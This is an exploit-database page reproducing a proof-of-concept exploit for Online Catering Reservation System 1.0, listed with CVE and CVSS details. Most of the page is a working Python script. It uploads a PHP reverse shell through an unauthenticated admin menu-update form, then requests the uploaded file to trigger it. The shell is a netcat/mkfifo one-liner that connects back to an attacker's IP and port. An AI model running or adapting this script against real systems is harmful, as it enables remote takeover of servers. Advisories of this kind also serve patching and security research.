Advertisement






Online Catering Reservation System 1.0 - Unauthenticated Remote Code Execution

CVE Category Price Severity
CVE-2021-38427 CWE-94 Unknown High
Author Risk Exploitation Type Date
exploitalert.com Critical Remote 2021-04-15
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040089

Below is a copy:

Online Catering Reservation System 1.0 - Unauthenticated Remote Code Execution
|===========================================================================
| # Exploit Title : Online Catering Reservation System 1.0 - Unauthenticated Remote Code Execution
|                                                                           
| # Author : Ali Seddigh                                                    
|                                                                           
| # Category : Web Application
|
| # Vendor Homepage: https://www.sourcecodester.com 
|
| # Software Link: https://www.sourcecodester.com/php/11355/online-catering-reservation.html                                                                                                                                                                                                                                                                                 
|                                                                           
| # Tested on : [ Windows ~> 10]                                                     
|
| # Version : 1.0
|                  
| # Date : 2021-04-13                                                       
|===========================================================================

# --- Description --- #

#The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.

# --- Proof of concept --- #

#!/usr/bin/python3
import random
import sys
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

def file_upload(target_ip, attacker_ip, attacker_port):
  random_file_name = str(random.randint(100000, 999999)) + "revshell.php"
  revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
  m = MultipartEncoder(fields={'id': '1337', 'menu':'PWN', 'cat': '1337', 'subcat':'PWN','desc':'PWN','price':'13.37', 'image': (random_file_name, revshell_string, 'application/x-php'),'update':''})
  print("(+) Uploading php reverse shell..")
  r1 = requests.post('http://{}/reservation/admin/menu_update.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
  if "Successfully updated menu details!" in r1.text:
    print("(+) File upload seems to have been successful!")
    return random_file_name
  else:
    print("(-) Oh no, file upload seems to have failed.. quitting.")
    exit()

def trigger_shell(target_ip, filename):
  url = 'http://{}/reservation/images/{}'.format(target_ip, filename)
  print("(+) Now trying to trigger our shell by requesting {} ..".format(url))
  r2 = requests.get(url)
  return None

def main():
  if len(sys.argv) != 4:
    print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0])
    print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
    sys.exit(-1)

  target_ip = sys.argv[1]
  attacker_ip = sys.argv[2]
  attacker_port = sys.argv[3]

  uploaded_filename = file_upload(target_ip, attacker_ip, attacker_port)
  trigger_shell(target_ip, uploaded_filename)
  print("\n(+) done!")

if __name__ == "__main__":
  main()

|===========================================================================
| # Discovered By : Ali Triplex                                             
|===========================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum